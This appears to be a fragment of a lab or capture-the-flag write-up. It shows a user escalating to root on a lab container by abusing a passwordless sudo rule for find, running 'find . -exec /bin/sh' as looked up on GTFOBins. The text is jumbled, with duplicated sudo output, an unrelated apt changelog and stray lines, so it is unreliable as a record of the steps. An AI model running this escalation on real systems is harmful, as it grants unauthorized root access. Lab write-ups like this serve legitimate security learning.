use_pty
Now, we are going to search in gtobins find as you can see below.
User bobby may run the following commands on 943f6acd83a3:
(root) NOPASSWD: /usr/bin/find
sudo -u "bobby" /usr/bin/apt changelog apt
apt (2.4.12) jammy; urgency=medium
* Restore ?garbage by calling MarkAndSweep before parsing (LP: #1995790)
* For phasing, check if current version is a security update, not just previou
s ones
(LP: #2051181)
-- Julian Andres Klode <juliank@ubuntu.com> Tue, 13 Feb 2024 16:39:04 +0100
apt (2.4.11) jammy; urgency=medium
* Backport archive snapshot integration as of 2.7.3 (LP: #2038453)
-- Julian Andres Klode <juliank@ubuntu.com> Fri, 06 Oct 2023 10:53:53 +0200
apt (2.4.10) jammy; urgency=medium
* dist-upgrade: Revert phased updates using keeps only (LP: #2025462)
* Do not mark updates for install that are still phasing (same bug)
* Compare SHA256 to check if versions are really the same (Closes: #931175)
(LP: #2029268)
-- Julian Andres Klode <juliank@ubuntu.com> Wed, 02 Aug 2023 15:15:58 +0200
!/bin/bash
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ whoami
bobby
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -l
Matching Defaults entries for bobby on 943f6acd83a3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
Now, we are going to search in gtobins find as you can see below.
User bobby may run the following commands on 943f6acd83a3:
(root) NOPASSWD: /usr/bin/find
sudo -u "root" /usr/bin/find . -exec /bin/sh \; -quit
# whoami
root
# bash -p
root@943f6acd83a3:/var/www/dev.hidden.lab/uploads#
# whoami
root
# bash -p
root@943f6acd83a3:/var/www/dev.hidden.lab/uploads#
Thank you very much for reading this article
I hope you liked and learned something new
This article has been done with ethical proposes
Good Hack
Comments
Post a Comment